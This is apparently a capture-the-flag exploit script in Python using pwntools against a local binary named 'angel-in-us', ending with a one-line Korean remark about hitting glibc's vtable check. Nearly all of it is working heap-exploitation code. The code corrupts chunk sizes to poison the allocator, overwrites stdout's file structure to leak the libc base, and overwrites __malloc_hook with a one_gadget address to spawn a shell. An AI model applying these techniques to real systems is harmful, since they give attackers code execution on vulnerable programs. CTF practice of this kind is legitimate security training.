Angel-in-us
from pwn import *

def alloc(size, pay):
    p.sendafter('>', 'M')
    p.sendlineafter('>', str(size))
    p.sendafter('>', pay)

def edit(size, pay):
    p.sendafter('>', 'E')
    p.sendlineafter('>', str(size))
    p.sendafter('>', pay)

p = process('./angel-in-us')
e = ELF('./angel-in-us')
l = e.libc

for i in range(0x30):
    alloc(0x130, 'a')

alloc(0x90, 'a')
edit(0xa0, 'a'*0x90+p64(0)+p64(0x111))

p.sendafter('>', 'M')
p.sendlineafter('>', '1'*0x410)

edit(0xb0, 'a'*0x90+p64(0)+p64(0xf1)+p64(0x404020))
alloc(0xe0, 'a')
alloc(0xe0, '\x60')
alloc(0xe0, p64(0xfbad1800)+'\x00'*0x19)

libc = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 0x3ed8b0
print hex(libc)

for i in range(0x32):
    alloc(0x130, 'a')
    
alloc(0x50, 'a')
edit(0x60, 'a'*0x50+p64(0)+p64(0x121))

p.sendafter('>', 'M')
p.sendlineafter('>', '1'*0x410)

edit(0x70, 'a'*0x50+p64(0)+p64(0x101)+p64(libc+l.sym['__malloc_hook']))
alloc(0xf0, 'a')
alloc(0xf0, p64(libc+0x10a38c))

p.interactive()

_IO_2_1_stdout 다 덮어서 쉘 따려했는데 vtable check ㅠㅠ